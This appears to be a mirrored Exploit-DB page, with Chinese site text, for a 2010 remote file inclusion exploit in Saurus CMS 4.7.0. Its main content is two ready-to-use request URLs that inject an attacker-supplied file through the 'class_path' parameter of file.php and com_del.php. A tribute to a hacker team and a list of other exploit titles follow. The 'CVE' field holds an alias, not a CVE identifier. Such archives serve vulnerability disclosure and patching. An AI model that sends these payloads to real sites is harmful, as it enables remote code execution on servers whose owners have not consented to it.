Saurus CMS 4.7.0 – Remote File Inclusion

Exploit Database
11 阅读

作者： LoSt.HaCkEr

日期： 2010-08-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/14618/

# Exploit Title: [SaurusCMSupdate4.7.0 Remote File Include ]
# Date: [11-8-2010]
# Author: LoSt.HaCkEr
# Software Link: [http://www.brothersoft.com/saurus-cms-download-17626.html]
# Version: [v 4.7.0]
# Tested on: [Windows XP]
# CVE : [هكر المسيب]
#____Contact__LoSt.HaCkEr[at]yahoo[dot]com

____________________________________
Exploit: http://target/SaurusCMSupdate4.7.0/saurus_cms_upd4.7.0/file.php?class_path=[EV!L]
____________________________________________
Exploit: http://target/SaurusCMSupdate4.7.0/saurus_cms_upd4.7.0/com_del.php?class_path=[EV!L]
____________________________________________
A special tribute to:

DannY.iRaQi - TeaM iRaQ HaCkers

last Exploits
Saurus CMS 4.7.0 – Remote File Inclusion的更多信息

OpenCart 3.0.36 – ATO via Cross Site Request Forgery：
NoteBurner 2.35 – Denial Of Service (DoS) (PoC)：
HP Insight Diagnostics Online Edition 8.4 – ‘parameters.php?device’ Cross-Site Scripting：
CmsLite 1.4 – ‘S’ SQL Injection：
Media Search Engine Script – ‘search’ SQL Injection：
SonicWALL SonicOS 5.8.1.8 WAF – Cross-Site Scripting：
PaysiteReviewCMS 1.1 – ‘search.php’ Cross-Site Scripting：
Joomla! Component Appointment 1.5 – Local File Inclusion：